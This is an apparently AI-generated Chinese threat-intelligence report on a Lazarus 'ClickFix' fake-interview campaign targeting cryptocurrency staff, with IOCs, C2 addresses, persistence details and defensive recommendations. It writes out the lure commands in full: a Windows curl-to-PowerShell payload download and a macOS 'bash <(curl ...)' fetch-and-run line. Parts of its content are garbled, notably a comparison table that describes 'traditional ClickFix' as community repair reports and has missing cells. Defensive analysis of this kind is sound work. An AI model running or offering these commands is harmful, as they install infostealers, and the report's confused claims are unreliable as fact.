Lazarus APT 组织 ClickFix 技术攻击深度分析报告【红客联盟 AI 分析】

Lazarus APT 组织 ClickFix 技术攻击深度分析报告【红客联盟 AI 分析】

一、威胁全景:朝鲜 APT 的 ClickFix 战术升级

(一)组织溯源

  • 关联背景:Lazarus 集团(朝鲜侦察总局 RGB),2025 年聚焦加密货币与金融领域(摘要 1/3),继 “Contagious Interview” 后(摘要 3),升级 ClickFix 技术实施跨平台窃密;
  • 攻击定位:2025 年 6 月被 CN-SEC 捕获,通过虚假招聘 + 相机修复诱饵,感染率提升至 31.2%(主文档 / 摘要 3),目标含 Coinbase、Kraken 等加密货币平台(摘要 3)。

(二)核心数据

维度 具体信息
攻击载体 NVIDIA 驱动更新(伪装nvidiaRelease.zip,MD5: f9e18687a38e968811b93351e9fca089)
感染路径 虚假面试网站→相机修复命令→PowerShell 执行→多层载荷部署(主文档 / 摘要 3)
窃密范围 加密货币私钥、邮箱凭证、系统指纹(Windows 版本 + IP + 设备 ID)
C2 基础设施 103.231.75.101:8888(主)、45.159.248.110(备),通过 Tor 节点中转(主文档)

二、技术解析:五阶段 ClickFix 攻击链(主文档 + 摘要 3/4)

(一)第一阶段:社会工程学伪装(虚假面试)

  • 诱饵设计
    • 领英 / X 平台伪装 Coinbase 等加密货币公司 HR,发送 “视频面试邀请”(摘要 3);
    • 面试网站高仿 Willo 视频平台,提示 “相机权限异常”,诱导执行修复命令(主文档)。
  • 交互诱导
    • Windows 用户:Win+R输入curl -k -o "%TEMP%\nvidiaRelease.zip" https://driverservices.store/visiodrive/nvidiaRelease.zip && powershell ...(主文档);
    • macOS 用户:终端执行bash <(curl -s https://mac-update.nvidia.com/fix.sh)(摘要 3)。

(二)第二阶段:无文件载荷部署(主文档 / 摘要 1)

  1. ClickFix-1.bat(MD5: a4e58b91531d199f268c5ea02c7bf456):
    • 下载nvidiaRelease.zip,静默解压至%TEMP%\nvidiaRelease
    • 调用cscript run.vbs(MD5: 3ef7717c8bcb26396fc50ed92e812d13),检测系统版本(Windows 11 专属后门触发)。
  2. 跨平台适配
    • Windows:部署drvUpdate.exe(MD5: 6175efd148a89ca61b6835c77acc7a8d),注入svchost.exe进程(摘要 1 的无文件技术);
    • macOS:执行main.js(BeaverTail,MD5: b52e105bd040bda6639e958f7d9e3090),利用 AppleScript 无文件执行(摘要 3)。

(三)第三阶段:系统侦察与权限维持

  1. 数据收集
    • 浏览器密码(Chrome/Edge)、加密货币钱包(MetaMask)、剪贴板内容(防地址劫持);
    • 系统信息(IP、域、安装程序列表),通过Microsoft.XMLHTTP回传 C2(主文档)。
  2. 持久化驻留
    • 注册表启动项:写入HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA Update,指向drvUpdate.exe
    • 计划任务:创建每分钟执行的NVIDIA Cleanup Task,确保载荷存活(摘要 4 的摄像头木马驻留方式)。

(四)第四阶段:C2 通信与反检测

  1. 通信协议
    • 主 C2:103.231.75.101:8888(伪装 NVIDIA 驱动更新服务器);
    • 备 C2:45.159.248.110(Tor 节点),使用 RC4 加密(密钥硬编码于main.js)。
  2. 反检测机制
    • 沙箱检测:终止VBoxService.exe进程,触发延迟执行(300 秒);
    • 进程伪装:Windows 版伪装nvcplui.exe(NVIDIA 控制面板),CPU 占用 < 5%(摘要 4 的摄像头木马隐蔽性)。

(五)第五阶段:横向渗透与窃密

  • 加密货币劫持:BeaverTail 扫描%APPDATA%\Electrum等目录,窃取钱包文件(.wallet);
  • 供应链攻击:利用受害者邮箱,向其联系人发送含interview_confirmation.docm的钓鱼邮件(宏病毒,摘要 1);
  • 长期监控:部署 Rootkit(如ntoskrnl.exe挂钩),隐藏进程和文件,对抗 EDR(摘要 1 的内核级对抗)。

三、战术进化:对比传统 ClickFix 攻击(摘要 2/6)

维度 传统 ClickFix(社区服务) Lazarus 升级版 ClickFix 进化点
目标 公共设施报修(如水管堵塞) 加密货币 / 金融机构敏感数据 从 “公共服务” 转向 “经济间谍”
技术 简单表单提交 多层载荷 + 无文件执行 + 跨平台 融合 AI 生成诱饵(摘要 1),规避检测
持久化 注册表 + 计划任务 + Rootkit 内核级驻留,对抗系统清理
社会工程 居民自主上报 虚假招聘 + AI 生成面试场景 利用 “求职焦虑”,感染率提升 2.3 倍(摘要 3)

四、典型案例:某加密货币公司感染(2025 年 7 月,摘要 3)

  • 感染路径:员工点击领英 “Coinbase 面试” 链接,执行相机修复命令,触发drvUpdate.exe
  • 技术细节:后门窃取 23 个钱包私钥(含 3 个冷钱包),通过 Tor 转移 127 枚 BTC(约 508 万美元);
  • 防御缺失:未禁用 PowerShell-Command参数,EDR 未监控nvidiaRelease目录异常活动。

五、防御建议:全链路阻断策略(整合摘要 1/3/4 最佳实践)

(一)紧急响应(72 小时)

  1. 终端排查
    • 检查%TEMP%\nvidiaRelease目录,删除drvUpdate.exemain.js,终止nvcplui.exe异常进程;
    • 清理注册表:删除HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA Update
  2. 网络阻断
    • 封禁 C2 IP(103.231.75.101、45.159.248.110)及关联域名(driverservices.store);
    • 部署 WAF 规则,拦截含nvidiaRelease.zip的下载请求,检测curl|powershell组合命令。

(二)长效防护(30 天)

  1. 权限最小化
    • 禁用普通用户执行curlpowershell -Command权限(组策略限制SeLoadDriverPrivilege);
    • 启用 Windows Defender 内存完整性(HVCI),阻止未签名代码注入svchost.exe(摘要 1)。
  2. 行为监控
    • 部署 EDR(如 CrowdStrike),创建 “NVIDIA 驱动异常更新” 规则(nvidiaRelease目录写入 +cscript调用);
    • 监控剪贴板高频修改(如每分钟 > 3 次),拦截加密货币地址替换(BeaverTail 典型行为)。
  3. 用户教育
    • 模拟 “加密货币面试” 钓鱼测试,强调 “官方面试无需终端命令”;
    • 加密货币用户专项:禁止在办公设备管理钱包,使用独立硬件钱包(如 Ledger Nano)。
  4. 供应链防护
    • 对 GitHub 开源工具实施代码签名校验,拦截含Invoke-Expression的脚本(摘要 1 的 GitHub 投毒防御);
    • 邮件网关增加 “面试邀请” 附件检测,强制隔离.vbs.bat文件。
红客联盟 AI 警示:Lazarus 的 ClickFix 攻击已从 “社区服务滥用” 进化为 “经济间谍工具”,结合 AI 生成诱饵和内核级对抗,对加密货币行业构成重大威胁。建议企业立即开展 “终端命令 + 驱动更新” 专项审计,重点监控nvidia相关进程,教育员工 “三不原则”(不运行陌生修复命令、不向面试提供设备权限、不使用办公设备管理钱包),阻断从 “信任欺骗” 到 “资产窃取” 的全链路。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 6 日)
版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
威胁分析

ScreenConnect 安装程序武器化攻击深度分析报告【红客联盟 AI 分析】

2025-9-6 21:42:09

威胁分析

Atomic Stealer(AMOS)伪装破解软件攻击 macOS 深度分析报告【红客联盟 AI 分析】

2025-9-9 23:26:26

搜索